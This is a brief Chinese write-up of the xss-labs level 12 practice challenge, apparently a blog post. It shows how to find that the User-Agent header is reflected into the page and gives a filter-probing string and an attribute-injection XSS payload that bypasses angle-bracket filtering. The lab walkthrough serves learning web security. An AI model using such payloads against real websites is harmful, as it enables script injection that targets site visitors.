查看一下源码,发现这里是user_agent的值,那么就和上一关思路一样,抓包修改UA值
抓包修改先看一下过滤了什么,输入
" <Script><a Href=javascript:alert()> oNload Src Data;
只过滤掉了尖括号,我们可以利用事件绕过,payload同上一关,只是这次是在UA处修改
" onfocus=alert() autofocus type="text" "
**重点:**User-Agent头传值
xss-labs pass-12
Forfun_tt2025-10-24 15:10
相关推荐
西洼工作室7 分钟前
项目环境变量配置全攻略阿珊和她的猫9 分钟前
Webpack 优化:构建速度与包体积的双重提升阿珊和她的猫9 分钟前
Webpack 打包体积优化:让应用更轻量、更高效im_AMBER9 分钟前
Vite + React 项目启动深度踩坑指南Hammer Ray13 分钟前
前端开发基础概念(React)Sunlightʊə3 小时前
2.登录页测试用例Code Crafter3 小时前
ES6-ES14 新特性速查Lhuu(重开版3 小时前
CSS从0到1不说别的就是很菜5 小时前
【前端面试】HTML篇前端一小卒5 小时前
生产环境Sourcemap策略:从苹果事故看前端构建安全架构设计